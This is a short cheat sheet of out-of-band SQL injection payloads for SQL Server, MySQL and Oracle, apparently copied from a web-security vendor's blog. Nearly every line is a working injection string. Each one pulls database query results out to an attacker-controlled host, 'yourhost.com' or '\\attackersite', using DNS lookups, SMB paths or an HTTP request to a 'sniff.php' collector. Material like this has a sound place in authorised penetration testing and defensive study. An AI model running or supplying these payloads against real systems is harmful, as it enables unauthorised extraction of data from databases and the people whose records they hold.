Some use cases for out of band SQL Injection

SQL Server
	?vulnerableParam=1; SELECT * FROM OPENROWSET('SQLOLEDB', ({INJECTION})+'.yourhost.com';'sa';'pwd', 'SELECT 1')
	Makes DNS resolution request to {INJECT}.yourhost.com

Bulk insert to look for OOB attacks for MS-SQL
	BULK INSERT mytable FROM '\\attackersite'

MySQL
	?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}), 'yourhost.com\\')))
	Makes a NBNS query request/DNS resolution request to yourhost.com

Oracle
	?vulnerableParam=(SELECT UTL_HTTP.REQUEST('http://yourhost.com/sniff.php?sniff='||({INJECTION})||'') FROM DUAL)
	Sniffer application will save results

	?vulnerableParam=(SELECT UTL_INADDR.get_host_addr(({INJECTION})||'.yourhost.com') FROM DUAL)
	You need to sniff dns resolution requests to yourhost.com

source: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/#OutOfBandChannelAttacks